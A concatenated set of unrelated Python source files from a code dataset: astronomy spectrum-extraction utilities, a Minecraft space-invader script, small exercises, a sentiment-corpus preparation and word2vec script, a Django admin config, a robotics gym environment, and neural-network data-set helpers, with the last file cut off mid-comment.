header_tmp = data[idx].header\n list_headers.append(header_tmp)\n \n #To debug\n #spectra_viewer(data_tmp)\n \n return data_err, list_headers\n\t\ndef extract_single_data(data_err, list_headers, specnum):\n\t\"\"\"\n\tExtract single spectrum data, err, header from the list, arr provided by preprocessor.\n\t- specnum: Target object number in a file. Ranges from 1 through approx. 140.\n\t\"\"\"\n\theader = list_headers[specnum]\n\tdata = data_err[specnum, 0]\n\terr = data_err[specnum, 1]\n\t\n\treturn data, err, header\n\ndef ivar_from_err(err):\n\treturn 1./np.square(err)\n\ndef bit_from_header(header):\n\tname = header[\"SLITOBJ\"]\n\tif name == \"stars\":\n\t\tname = 2**1\n\telif name == \"gal\":\n\t\tname = 2**2\n\treturn int(name)\n\t\ndef naive_profile(data, ivar):\n\t\"\"\"\n\tReturns naive normalized profile\n\t\"\"\"\n\tK = np.sum(data * ivar, axis = 1) / np.sum(ivar, axis = 1)\n\tK /= np.sum(K) # Normalization\n\treturn K\n\ndef extract_stellar_profiles(masknumber, data_err, list_headers):\n\tK_collection = []\n\t\n\tcount = 0 #counter for how many stellar profiles\n\tfor specnum in range(1, len(list_headers)):\n\t\tdata, err, header = extract_single_data(data_err, list_headers, specnum)\n\t\tivar = ivar_from_err(err)\n\n\t\tBIT = bit_from_header(header)\n\t\t\n\t\t# ---- Perform optimal extraction 1D spectrum from 2D\n\t\tif (BIT == 2):\n\t\t\tK = naive_profile(data, ivar)\n\t\t\tK_collection.append(K) # Collect K into a list.\n\t\t\t\n\t\t\t#Plot stellar profile; optional for diagnosis\n\t\t\t#crval1, wavegrid = wave_grid(header, data)\n\t\t\t#plt.imshow(data, extent = (crval1, wavegrid[-1], data.shape[0], 0), \\\n\t\t\t#cmap = 'gray', aspect = 'auto', vmin = 0, vmax = 1)\n\t\t\t#plt.title(\"mask: \" + str(masknumber) + \" idx: \" + str(specnum) +\" count: \" + str(count))\n\t\t\t#plt.savefig(\"mask-\" + str(masknumber) + \"-idx-\" + str(specnum) +\"-count-\" + str(count) + \".pdf\",\\\n\t\t\t#dpi = 600, bbox_inches = 'tight')\n\t\t\tprint(\"mask: \" + str(masknumber) + \" idx: \" + str(specnum) +\" count: \" + str(count))\n\t\t\tcount = count + 1\n\treturn K_collection\n\t\ndef K_exp_profile(mu, sig, beta = 2, Nrows = 21): \n\t\"\"\"\n\tGenerate gaussian extraction profile of length Nrows\n\tgiven mu and sig.\n\t\"\"\"\n\tx_arr = np.arange(0, Nrows, 1)\n\tK_gauss = np.exp(-0.5 * (np.abs(x_arr - mu)/(sig))**beta)\n\tK_gauss /= np.sum(K_gauss)\n\t\n\treturn K_gauss\n\t\ndef plot_kernels(masknumber, K_collection, K_extract, fname):\n\t\"\"\"\n\tPlot the collection of stellar kernels and the ultimate\n\textraction kernel at the center.\n\tModify to include masknumber to plot pathological cases\n\t\"\"\"\n\t\n\tK_collection = np.array(K_collection)\n\tfig, ax = plt.subplots(1, figsize=(10, 5))\n\tfor i in range(len(K_collection)):\n\t\tif(masknumber == 1624 or masknumber == 1625):\n\t\t\tif(K_collection[i, 0] == np.min(K_collection[:,0])):\n\t\t\t\tprint(i)\n\t\t\t\tax.plot(K_collection[i], c=\"green\", lw=0.5) \n\t\t\telse:\n\t\t\t\tax.plot(K_collection[i], c=\"red\", lw=0.5)\n\t\telif(masknumber == 1627):\n\t\t\tif(K_collection[i, 0] == np.max(K_collection[:,0])):\n\t\t\t\tprint(i)\n\t\t\t\tax.plot(K_collection[i], c=\"green\", lw=0.5) \n\t\t\telse:\n\t\t\t\tax.plot(K_collection[i], c=\"red\", lw=0.5)\n\t\telse:\n\t\t\tax.plot(K_collection[i], c=\"red\", lw=0.5)\n\tax.plot(K_extract, c=\"blue\", lw=1.5)\n\t#ax.set_ylim([-0.03, 0.3])\n\tax.axhline(y=0, c=\"black\", ls=\"--\", lw=1.)\n\tplt.savefig(fname, dpi=600, bbox_inches=\"tight\")\n\tplt.close()\n\n\treturn\n\t\ndef index_edges(data, num_thres=20):\n\t\"\"\"\n\tGiven long postage stamp of data, return the edges.\n\t\"\"\"\n\tidx_min = 0\n\tidx_max = data.shape[1]-1\n\ttally = np.sum(data == 0., axis=0)\n\twhile tally[idx_min] > num_thres:\n\t\tidx_min += 1\n\twhile tally[idx_max] > num_thres:\n\t\tidx_max -=1\n\treturn idx_min, idx_max\n\ndef produce_spec1D(data_err, list_headers, K_extract, mu, fname_prefix=None, verbose=True):\n\t\"\"\"\n\tGiven 2D spectrum and the extraction kernel K_extract,\n\tproduce 1D spectra (Ntargets+1, 2, Ncols) and their inverse variance.\n\t\"\"\"\n\tdata_ivar_1D = np.zeros((data_err.shape[0], 2, data_err.shape[3]))\n\tK_extract = K_extract[:,np.newaxis]\n\tfor specnum in range(1, len(list_headers)):\n\t\tif verbose and ((specnum % 10) == 0): #Show progress every 10 spectra\n\t\t\tprint(\"Processing spec num: %d\" % specnum)\n\t\tdata, err, header = extract_single_data(data_err, list_headers, specnum)\n\t\tivar = ivar_from_err(err)\n\n\t\tspec1D_ivar = np.sum(np.square(K_extract) * ivar, axis=0)\n\t\tspec1D = np.sum(K_extract * data * ivar, axis=0) / spec1D_ivar\n\t\t\n\t\tdata_ivar_1D[specnum, 0] = spec1D\n\t\tdata_ivar_1D[specnum, 1] = spec1D_ivar\n\t\t\n\t\t#extract edges along wavelength\n\t\tidx_min, idx_max = index_edges(data, num_thres=14)\n\t\t\n\t\t#produce wavegrid to see in spectra in range\n\t\tcrval1, wavegrid = wave_grid(data, header)\n\t\t\t\n\t\tif fname_prefix is not None:\n\t\t\tplt.close()\n\t\t\t# ---- Spec figures\n\t\t\t\n\t\t\tfname = fname_prefix + \"spec%d-2D.png\" %specnum\n\t\t\tfig, ax = plt.subplots(1, figsize=(17, 1))\n\t\t\tax.imshow(data, aspect=\"auto\", cmap=\"gray\", interpolation=\"none\",\\\n\t\t\textent = (crval1, wavegrid[-1], data.shape[0], 0), vmin=0., vmax=1)\n\t\t\tax.set_xlim(wavegrid[idx_min], wavegrid[idx_max])\n\t\t\tax.axhline(y=mu+0.5, c=\"red\", ls=\"--\", lw=0.8)\n\t\t\tax.set_xlabel(r\"$\\lambda$ [nm]\", fontsize = 15)\n\t\t\tplt.savefig(fname, dpi=250, bbox_inches=\"tight\")\n\t\t\tplt.close()\n\t\t\t\n\t\t\t\"\"\"# ---- Histogram of centers determined\n\t\t\tfname = fname_prefix + \"spec%d-centers.png\" %specnum\n\t\t\tfig, ax = plt.subplots(1, figsize=(7, 3))\n\t\t\tax.hist(row_centers, bins=np.arange(0.5, 32.5, 1), histtype=\"step\", color=\"black\", normed=True)\n\t\t\tax.plot(K_extract, c=\"red\", label=\"K_stellar\")\n\t\t\tax.axvline(x=mu, c=\"red\", ls=\"--\", lw=0.4)\n\t\t\tplt.savefig(fname, dpi=200, bbox_inches=\"tight\")\n\t\t\tplt.close()\"\"\"\n\n\treturn data_ivar_1D","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"365697613","text":"###make your own space invader program###\nimport mcpi.minecraft as minecraft, time, random #importing mcpi.minecraft and giving it the alius of minecraft, and imports time and random modules\nmc = minecraft.Minecraft.create()\n\nmc.setBlocks(-30,-5,-30,30,30,30,0) #clears an area\nmc.player.setPos(11,0,0) #sets players position in front of where the sapce invader will be\n\ncolours = [\"white\",\"orange\",\"magenta\",\"light blue\",\"yellow\",\"lime\",\"pink\",\"grey\",\"light grey\",\"cyan\",\"purple\",\"blue\",\"brown\",\"green\",\"red\",\"black\"]\n\n\n#defines a function to convert the string the user inputs into a block id,\n#it takes the parameter colourstring\ndef colourconvertor(colourstring):\n # converts the colourstring into lower case and removes spaces\n colourstring = colourstring.lower().strip()\n\n blockid = -1 #defines blockid as -1 so later we can see if it changes in the for loop\n \n \n for bid in range (0,len(colours)): #bid (block id) is made equal to each string in colours\n if colourstring == colours[bid]: #if what the user entered is in the colours list then blockid is made equal to the number of the colour in the colours list, and the loop is stopped \n blockid = bid\n break\n\n if blockid == -1: #if the blockid hasnt changed (because what was entered wasnt in the colours list) then a random colour is chosen\n blockid = random.randint(0, len(colours)) #picks a random colour from the list\n print (\"I didn't understand that, I'll just choose ...\" +colours[blockid] +\"!\") #prints what the random choice \n\n return blockid \n \n \n\n \n\n\n#defines a function called drawmirroredblocks \n#takes the parameters of the coordinates, and the colour and background\n#colour of the space invader, and the blocks to colour\ndef drawmirroredblocks(xcorner,ycorner,zcorner,colour,pixels):\n \n wool = 35 #wool is defined\n y = ycorner\n for block in pixels:\n if block <0:\n y = y+block # when blocks are negative, the y coordiinate moves down by that number, so starting a new line\n else:\n x = xcorner + block #if it isnt a negative, the numbers are used on the x coordinate \n z = zcorner #the z coordinate stays the same\n\n mc.setBlock(x,y,z,wool,colour) #this only creates half the space invader\n\n x = xcorner + 12 - block #mirrors the half the space invader to create a whole space invader\n\n mc.setBlock(x,y,z,wool,colour) #sets the blocks with the new x coordinate to mirror the space invader, creating the whole space invader\n \ndef spaceinvader(xcorner,ycorner,zcorner,colour,background): #draws an animated space invader\n wool = 35 #wool is defined\n mc.setBlocks(xcorner,ycorner,zcorner,xcorner+12,ycorner-9,zcorner,wool,background) #creates a rectangle which is the colour of the background the user chose\n pixels =(-1,3,-1,4,-1,3,4,5,6,-1,2,3,5,6,-1,1,2,3,4,5,6,-1,1,3,4,5,6,-1,1,3,-1,4,5) #the blocks that are the base shape of the space invader\n arms_up =(-2,1,-1,1,-1,1,-4,2) #arms up extra blocks\n arms_down =(-6,1,-1,1,-1,4,5) #arms down extra blocks\n \n drawmirroredblocks(xcorner,ycorner,zcorner,colour,pixels) #draws space invader\n \n while True: #deletes one set of arms and draws the other, in an infinite loop, making the space invader move\n drawmirroredblocks(xcorner,ycorner,zcorner,colour,arms_up) \n drawmirroredblocks(xcorner,ycorner,zcorner,background,arms_down)\n time.sleep(1)\n drawmirroredblocks(xcorner,ycorner,zcorner,background,arms_up) \n drawmirroredblocks(xcorner,ycorner,zcorner,colour,arms_down)\n time.sleep(1)\n \n \n\n\n# asks what colour the user wants the space invader to be\nusercolour = raw_input (\"what colour do you want the space invader to be?\") \n\ncolour = colourconvertor(usercolour) #runs the function colourconvertor on the colour the user chose\n \n#asks the user what colour they want the background colour to be \nuserbackground = raw_input (\"what colour background do you want it to have?\")\n\n\n\nbackground = colourconvertor(userbackground)#runs the function colourconvertor on the background colour the user chose\n\nprint (\"ok then, I'll make a space invader that is \" +colours[colour] +\" and has a background colour of \" +colours[background]) #tells the user what colour the space invader will be\n\nspaceinvader(5,4,15,colour,background) #runs the space invader function with the colour and background the user chose\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Minecraft/Space_invader/space_invader_6.py","file_name":"space_invader_6.py","file_ext":"py","file_size_in_byte":5411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"275244701","text":"''' To reverse sentence in right order Ex: Good Morning. Output: doog gninrom\nhttps://stackoverflow.com/questions/493819/python-join-why-is-it-string-joinlist-instead-of-list-joinstring?rq=1\n'''\nsentence=input(\"Enter the sentence to get reversed sentence: \")\nreversed_sentence=sentence[::-1] \n# Used Slicing Technique- a string[::-1] to reverse string\ntemp=reversed_sentence.split() #used split for each word to copy to a temp list var\ntemp.reverse() #Reversed splitted temp list\nreversed_list=list(temp) #copied reversed temp list using list()-python v3 function not v2\n#Now we have to join the reversed list in reverse open\nreversed_sentence=\" \".join(reversed_list) #used \"\".join() to slice and merge the reversed list\nprint(reversed_sentence.lower()) #used lower() to change all words to lowercase.\n","sub_path":"repl.it/reverse_sentence.py","file_name":"reverse_sentence.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"527844664","text":"# Joshua Li\n# Euler Problem #19\n\n# How many Sundays fell on the first of the month during the twentieth century (1 Jan 1901 to 31 Dec 2000)?\n\nfrom datetime import date, datetime, timedelta\n\ndef date_range(start, end, delta):\n curr = start\n while curr < end:\n yield curr\n curr += delta\n\nanswer = 0\nfor result in date_range(date(1901, 1, 1), date(2000, 12, 31), timedelta(days=1)):\n\tif result.day == 1 and result.isoweekday() == 7:\n\t\tanswer += 1\nprint(answer)","sub_path":"Problems 11-20/EulerProblem19.py","file_name":"EulerProblem19.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"111844139","text":"import json\nimport random\nimport os\n\n\ndef db2local(save_file):\n \"\"\"\n 从MongoDB 获取数据,保存到save_file中\n :param save_file:\n :return:\n \"\"\"\n # 配置client\n import pymongo\n client = pymongo.MongoClient(\"192.168.50.139\", 27017)\n # 设置database\n db = client['ai-corpus']\n # 选择哪个collections\n collection = db['as_corpus']\n mydoc = collection.find({})\n with open(save_file, 'w') as f:\n for x in mydoc:\n x.pop('_id')\n content = json.dumps(x)\n f.write(content + '\\n')\n print(f\"文件已生成{save_file}\")\n\ndef split_all(save_file, train_rate=0.9, test_rate=0.1):\n \"\"\"\n 拆分成90%训练集,10%测试集\n :param save_file:\n :param train_rate: float\n :param test_rate:\n :return:\n \"\"\"\n random.seed(30)\n examples = []\n with open(save_file, 'r') as f:\n lines = f.readlines()\n # 每3行一个样本\n for i in range(0, len(lines), 3):\n examples.append((lines[i], lines[i + 1], lines[i + 2]))\n random.shuffle(examples)\n total = len(examples)\n train_num = int(total * train_rate)\n test_num = int(total * test_rate)\n train_file = os.path.join(os.path.dirname(save_file), 'train.txt')\n test_file = os.path.join(os.path.dirname(save_file), 'test.txt')\n with open(train_file, 'w') as f:\n for x in examples[:train_num]:\n f.write(x[0])\n f.write(x[1])\n f.write(x[2])\n with open(test_file, 'w') as f:\n for x in examples[train_num:]:\n f.write(x[0])\n f.write(x[1])\n f.write(x[2])\n print(f\"文件已生成\\n {train_file}, 样本数: {train_num} \\n {test_file}, 样本数: {test_num}\")\n\ndef textsentiment_process(save_file, new_file, truncate=None):\n \"\"\"\n 类似\n $T$ is super fast , around anywhere from 35 seconds to 1 minute .\n Boot time\n 1\n :param save_file:\n :param new_file: 存储到新文件\n :param truncate: 截断处理,截断前后,默认为None,可以为int,截断保留数字\n :return: 存储到文件\n \"\"\"\n # 原始文件中的sScore的映射方式\n class2id = {\n \"NEG\": 0,\n \"NEU\": 1,\n \"POS\": 2,\n }\n id2class = {value: key for key, value in class2id.items()}\n with open(save_file, 'r') as f:\n lines = f.readlines()\n # 打印多少条样本\n print_example = 10\n # 总数据量\n total = 0\n with open(new_file, 'w') as f:\n for line in lines:\n line_chinese = json.loads(line)\n # 使用 $T$代表apsect\n content = line_chinese[\"content\"]\n # 如果这个句子没有aspect,那就过滤掉\n if not line_chinese[\"aspect\"]:\n continue\n for aspect in line_chinese[\"aspect\"]:\n aspectTerm = aspect[\"aspectTerm\"]\n sScore = aspect[\"sScore\"]\n start = aspect[\"start\"]\n end = aspect[\"end\"]\n # 验证一下单词的位置是否在newcontent中位置对应\n aspectTerm_insentence = \"\".join(content[start:end])\n if not aspectTerm == aspectTerm_insentence:\n raise Exception(f\"单词在句子中位置对应不上,请检查,句子行数{total}, 句子是{line_chinese}\")\n if truncate:\n #如果truncate为数字,那么开始截断\n if truncate > start:\n left = content[:start]\n else:\n left = content[start-truncate:start]\n right = content[end:end+truncate]\n line1 = left + \"$T$\" + right\n else:\n line1 = content[:start] + \"$T$\" + content[end:]\n line2 = aspectTerm\n # sScore映射成我们需要的, -1,0,1格式\n line3 = str(sScore - 1)\n if print_example > 0:\n print(line1)\n print(line2)\n print(line3)\n print_example -= 1\n total += 1\n f.write(line1 + \"\\n\")\n f.write(line2 + \"\\n\")\n f.write(line3 + \"\\n\")\n print(f\"文件已生成{new_file}, 总数据量是{total}\")\n\ndef check_data(save_file):\n \"\"\"\n 没啥用,检查下数据\n :param save_file:\n :return:\n \"\"\"\n with open(save_file, 'r') as f:\n lines = f.readlines()\n\n without_aspect = []\n contents_lenth = []\n all_aspects = []\n for line in lines:\n line_chinese = json.loads(line)\n if not line_chinese[\"aspect\"]:\n without_aspect.append(line_chinese)\n print(line_chinese)\n else:\n contents_lenth.append(len(line_chinese[\"content\"]))\n for aspect in line_chinese[\"aspect\"]:\n aspectTerm = aspect[\"aspectTerm\"]\n all_aspects.append(aspectTerm)\n print(f\"没有aspect的数量是{len(without_aspect)}\")\n max_lenth = max(contents_lenth)\n max_aspect = max(map(len, all_aspects))\n max_aspect_word = list(filter(lambda x: len(x)>20, all_aspects))\n print(f\"最大的句子长度是{max_lenth}\")\n print(f\"最长的Apsect长度是{max_aspect}\")\n print(f\"长度大于20的aspect有{max_aspect_word}\")\n\ndef clean_cache():\n \"\"\"\n 删除../data/cosmetics/cached* 文件\n :return:\n \"\"\"\n os.system(\"rm -rf ../datasets/cosmetics/cached*\")\n os.system(\"rm -rf ../logs/*\")\n\ndef prepare_for_word2vec(save_file):\n \"\"\"\n 拆分成sentence_file 和user_dict 用于训练词向量\n :param save_file:\n :return: sentence_file, user_dict\n \"\"\"\n sentence_file = os.path.join(os.path.dirname(save_file), \"sentence_file.txt\")\n user_dict = os.path.join(os.path.dirname(save_file), \"user_dict.txt\")\n with open(save_file, 'r') as f:\n lines = f.readlines()\n with open(sentence_file, 'w') as sf:\n with open(user_dict, 'w') as uf:\n for line in lines:\n line_chinese = json.loads(line)\n # 使用 $T$代表apsect\n content = line_chinese[\"content\"]\n sf.write(content + \"\\n\")\n # 如果这个句子没有aspect,那就过滤掉\n if not line_chinese[\"aspect\"]:\n continue\n for aspect in line_chinese[\"aspect\"]:\n aspectTerm = aspect[\"aspectTerm\"]\n uf.write(aspectTerm + \"\\n\")\n return sentence_file, user_dict\n\ndef train_word2vec(sentence_file, user_dict, dimension=300):\n \"\"\"\n word2vec 训练词向量\n :param sentence_file: 原始文件,包含所有语句\n :param user_dict: 用户自定义的字典\n :param dimension: 嵌入维度\n :return:\n \"\"\"\n import gensim\n from gensim.models import word2vec\n import jieba.analyse\n import jieba\n # 加载自定义词典\n jieba.load_userdict(user_dict)\n # 分隔的单词\n word_file_path = os.path.join(os.path.dirname(sentence_file), \"word_file.txt\")\n model_path = os.path.join(os.path.dirname(sentence_file),\"cosmetics_300d.txt\")\n with open(word_file_path, 'w', encoding='utf-8') as writer:\n with open(sentence_file, 'r', encoding='utf-8') as reader:\n # 加载所有数据\n content = reader.read()\n # 分词\n content = jieba.cut(content)\n # 合并结果\n result = ' '.join(content)\n # 结果输出\n writer.write(result)\n # 加载单词\n sentences = word2vec.LineSentence(word_file_path)\n # 训练词向量\n # sg: 1代表(Skip-gram) 0(CBOW), 默认为0\n # hs: 1代表hierarchical softmax 0代表负采样negative, 默认为0\n model = word2vec.Word2Vec(sentences, sg=0, hs=1, min_count=1,\n window=3, size=dimension, compute_loss=True)\n model.train(sentences, total_examples=model.corpus_count, epochs=5)\n #保存成纯文本文件\n model.wv.save_word2vec_format(model_path, binary=False)\n\ndef conver_embedding_file():\n \"\"\"\n 转换我们自己的预训练词向量,到embdding file的格式为\n 单词 300d向量\n :return:\n \"\"\"\n import numpy as np\n import json\n embedding_file = \"../embedding/model.npy\"\n word2index_file = \"../embedding/word2index.json\"\n # 保存新的txt格式的embedding\n word2vec_file = \"../embedding/cosmetics_300d_w2v.txt\"\n embedding_array = np.load(embedding_file)\n print(\"embdding array的shape是(单词数,嵌入维度):\",embedding_array.shape)\n\n #但因嵌入单词的索引\n with open(word2index_file,'r',encoding=\"utf-8\") as f:\n content = f.read()\n word_index = json.loads(content)\n print(\"索引中单词总数是: \",len(word_index))\n print(\"eg: 单词 [马拉河] 的索引是:\",word_index['马拉河'])\n id2index = {v:k for k,v in word_index.items()}\n with open(word2vec_file, 'w', encoding=\"utf-8\") as f:\n for idx, arr in enumerate(embedding_array):\n word = id2index[idx]\n if word == \"[ZERO]\":\n word = \"0\"\n string_array = \" \".join(map(str, arr.tolist()))\n f.write(f\"{word} {string_array}\\n\")\n\nif __name__ == '__main__':\n save_file = \"../data_root_dir/cosmetics/all.txt\"\n new_file = \"../data_root_dir/cosmetics/final_all.txt\"\n # db2local(save_file)\n textsentiment_process(save_file, new_file)\n split_all(new_file, train_rate=0.9, test_rate=0.1)\n # check_data(save_file)\n # clean_cache()\n # conver_embedding_file()\n # sentence_file, user_dict = prepare_for_word2vec(save_file)\n # train_word2vec(sentence_file, user_dict)\n","sub_path":"examples/mnli_example/utils/get_data_from_mongo.py","file_name":"get_data_from_mongo.py","file_ext":"py","file_size_in_byte":9686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"450972165","text":"from django.contrib import admin\nfrom django.contrib.admin import SimpleListFilter\nfrom django.contrib.auth.models import User\nfrom django.db.models import Q\n\nfrom .models import Coach\n\n\ndef full_name(obj):\n return \"{0} {1}\".format(obj.user.first_name, obj.user.last_name)\n\n\nfull_name.short_description = \"Full name\"\n\n\nclass StaffFilter(SimpleListFilter):\n title = 'staff status'\n parameter_name = 'is_staff'\n\n def lookups(self, request, model_admin):\n return (\n ('true', True),\n ('false', False),\n )\n\n def queryset(self, request, queryset):\n if self.value() == 'true':\n return queryset.filter(user__in=User.objects.filter(is_staff=True))\n elif self.value() == 'false':\n return queryset.filter(user__in=User.objects.filter(is_staff=False))\n\n\nclass CoachAdmin(admin.ModelAdmin):\n list_display = [full_name, 'gender', 'skype', 'description']\n list_filter = (StaffFilter,)\n\nadmin.site.register(Coach, CoachAdmin)\n","sub_path":"coaches/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"303054190","text":"from gym import utils\nfrom gym.envs.robotics import fetch_env\n\n\nclass FetchReachEnv(fetch_env.FetchEnv, utils.EzPickle):\n def __init__(self, reward_type='sparse'):\n initial_qpos = {\n 'robot0:slide0': 0.4049,\n 'robot0:slide1': 0.48,\n 'robot0:slide2': 0.0,\n }\n fetch_env.FetchEnv.__init__(\n self, 'fetch/reach.xml', has_object=False, block_gripper=True, n_substeps=20,\n gripper_extra_height=0.2, target_in_the_air=True, target_offset=0.0,\n obj_range=0.15, target_range=0.15, distance_threshold=0.05,\n initial_qpos=initial_qpos, reward_type=reward_type)\n utils.EzPickle.__init__(self)\n","sub_path":"gym/gym/envs/robotics/fetch/reach.py","file_name":"reach.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"101863726","text":"# James Morrissey\n# computingID: jpm9rk\n# find the root of x^7-3 on the interval (1,2) using 7 iterations of the secant method\n\nimport math\n\nITERATION_MAX = 10\n\np_zero = 2\np_one = 1\n\ndef function(xvalue):\n yvalue = xvalue**7 - 3\n return yvalue\n\nfor i in range(ITERATION_MAX): # first iteration of this finds p_2\n estimated_root = p_one - function(p_one)*(p_one - p_zero)/(function(p_one) - function(p_zero)) # this is p2\n print('the estimated root for iteration', i+1, 'is', estimated_root)\n if i > -1:\n print(' 1: the absolute difference between p', i+2, 'and p', i+1, 'is', abs(estimated_root-p_one))\n print(' 2: the absolute difference between p', i+2, 'and the true root is', abs(estimated_root - 3**(1/7)))\n print(' 3: the absolute difference between p', i+1, 'and the true root is', abs(p_one-3**(1/7)))\n ratio = abs((estimated_root - p_one))/abs((p_one - p_zero))**1.618\n print(' the desired ratio is',ratio)\n p_zero = p_one\n p_one = estimated_root\n\n# Inspection of the output shows that after the initial iteration, the absolute difference between\n# p_n and the actual value of the root becomes the smallest of the three quantities. As expected, p_n is always\n# closer to the true value of the root than p_n-1, indicating that our approximations to the root are getting\n# better with each iteration\n# the actual value of the ratio asked for is about 1.79\n# doing 10 iterations of the secant method yields what is effectively 0 difference between estimated root\n# and the actual one. As shown if ITERATION_MAX is changed to 10, the last value for the ratio is 1.765 showing\n# that this ratio is tending toward 1.79\n","sub_path":"MORRISSEY_25_6.py","file_name":"MORRISSEY_25_6.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"631557074","text":"import numpy\n\n\nclass RaveledMatrixList():\n \"\"\"\n Stores a list of matrices as one long vector.\n\n The matrices can still be accessed individually (in their original shape)\n through views. Any changes done to one of the matrices will be reflected in\n the raveled vector and vice versa.\n\n \"\"\"\n\n def __init__(self, shapes, raveled=None):\n \"\"\"\n Arguments:\n shapes (list): The shapes of the matrices as a list of 2-tuples. Each\n 2-tuple is of the form `(r, c)`, with `r` being the number of rows\n and `c` the number of columns.\n\n raveled (numpy.array, optional): One-dimensional vector of all the\n initial matrix values; the class takes ownership of the array. If\n not specified, the matrices will be zero-initialised.\n\n Raises:\n ValueError: The length of the `raveled` vector does not match the\n number of elements expected by the `shapes` list.\n\n \"\"\"\n\n if raveled is None:\n raveled = numpy.zeros(sum(x * y for x, y in shapes))\n elif sum(x * y for x, y in shapes) != raveled.size:\n raise ValueError('The raveled vector and shapes do not match.')\n\n self._raveled = raveled\n self._shapes = shapes\n self._views = [None] * len(shapes)\n\n for i in range(len(self._views)):\n start = sum(x * y for x, y in shapes[0:i])\n end = start + shapes[i][0] * shapes[i][1]\n self._views[i] = raveled[start:end].reshape(shapes[i])\n\n @property\n def raveled(self):\n return self._raveled\n\n @property\n def shapes(self):\n return self._shapes\n\n def __getitem__(self, key):\n return self._views[key]\n\n def __setitem__(self, key, value):\n self._views[key][:] = value\n\n def __len__(self):\n return len(self._views)\n\n\nclass Samples():\n \"\"\"\n Stores input and target samples to be used during training.\n\n The class offers a convenient way for related input and target arrays to\n be grouped together, while also ensuring that the number of samples in each\n is the same (i.e. both arrays have the same number of columns). The two\n arrays will be made immutable by setting `inputs.flags.writeable` and\n `targets.flags.writeable` to `False`.\n\n \"\"\"\n\n def __init__(self, inputs, targets):\n \"\"\"\n Arguments:\n inputs (numpy.array): Array of input samples of size `I`-by-`N`,\n where `I` is the number of input features and `N` is the number\n of samples.\n\n targets (numpy.array): Array of target samples of size `T`-by-`N`,\n where `T` is the number of output features and `N` is the same\n number of samples as for `inputs`.\n\n Raises:\n ValueError: The `inputs` and `targets` arrays have different number\n of samples (different number of columns).\n\n \"\"\"\n\n if inputs.shape[1] != targets.shape[1]:\n raise ValueError('Matrices have different number of samples.')\n\n inputs.flags.writeable = False\n targets.flags.writeable = False\n\n self._inputs = inputs\n self._targets = targets\n\n def __len__(self):\n \"\"\"\n Returns:\n (int): The number of samples\n\n \"\"\"\n assert self.inputs.shape[1] == self.targets.shape[1]\n return self.inputs.shape[1]\n\n @property\n def inputs(self):\n \"\"\" (numpy.array) The input samples array passed at construction \"\"\"\n return self._inputs\n\n @property\n def targets(self):\n \"\"\" (numpy.array) The target samples array passed at construction \"\"\"\n return self._targets\n\n\nclass Datasets():\n \"\"\"\n Holds train, validation and test sets to be used during training. These\n sets, as well as the values they contain, are immutable.\n\n \"\"\"\n\n def __init__(self, train, validation, test):\n \"\"\"\n Arguments:\n train (:class:`.Samples`): Data used during training.\n validation (:class:`.Samples`): Data used for cross-validation.\n test (:class:`.Samples`): Data used for the final test phase.\n\n Raises:\n ValueError: Samples sets cannot be `None` or empty.\n\n \"\"\"\n if None in (train, validation, test):\n raise ValueError('Sample sets cannot be `None`.')\n\n if 0 in (len(train), len(validation), len(test)):\n raise ValueError('Sample sets cannot be empty.')\n\n self._train = train\n self._validation = validation\n self._test = test\n\n @staticmethod\n def partition(inputs, targets, ratios):\n \"\"\"\n Partitions the given data into separate data sets, according to the\n indicated ratios. The arrays will be made immutable by setting their\n `flags.writeable` properties to `False`.\n\n Arguments:\n inputs (numpy.array): Array of input samples of size `I`-by-`N`,\n where `I` is the number of input features and `N` is the number\n of samples.\n\n targets (numpy.array): Array of target samples of size `T`-by-`N`,\n where `T` is the number of output features and `N` is the same\n number of samples as for `inputs`.\n\n ratios (float or int tuple): Tuple of three elements, `(A, B, C)`,\n where `A`, `B`, and `C` are the relative ratios of the train,\n validation, and test samples, respectively. None can be 0.\n\n Returns:\n (:class:`.Datasets`): The `Datasets` instance, with data partitioned\n as indicated.\n\n Raises:\n ValueError: The tuple does not have three elements, some of the ratio\n values are 0 or negative, or the `inputs` and `targets` arrays have\n different number of samples.\n\n \"\"\"\n\n if len(ratios) != 3:\n raise ValueError('The ratios argument must be a 3-tuple.')\n\n if any(r <= 0.0 for r in ratios):\n raise ValueError('Ratios must be positive.')\n\n if inputs.shape[1] != targets.shape[1]:\n raise ValueError('Different number of input and train samples.')\n\n inputs.flags.writeable = False\n targets.flags.writeable = False\n\n sizes = numpy.array(ratios)\n sizes = sizes * inputs.shape[1] / numpy.sum(sizes)\n sizes = sizes.astype(int)\n sizes[0] += inputs.shape[1] - numpy.sum(sizes)\n\n assert all(size > 0.0 for size in sizes)\n assert sum(sizes) == inputs.shape[1]\n\n x = inputs\n t = targets\n\n train, x, t = Datasets._take(x, t, sizes[0])\n validation, x, t = Datasets._take(x, t, sizes[1])\n test, _, _ = Datasets._take(x, t, sizes[2])\n\n return Datasets(train, validation, test)\n\n @property\n def train(self):\n \"\"\" (:class:`.Samples`) Train set (immutable and non-empty) \"\"\"\n return self._train\n\n @property\n def validation(self):\n \"\"\" (:class:`.Samples`) Validation set (immutable and non-empty) \"\"\"\n return self._validation\n\n @property\n def test(self):\n \"\"\" (:class:`.Samples`) Test set (immutable and non-empty) \"\"\"\n return self._test\n\n @staticmethod\n def _take(x, t, size):\n # This if-statement is not strictly necessary since numpy.hsplit\n # already handles this corner case, but it also throws a FutureWarning\n # that is not relevant to this code and only 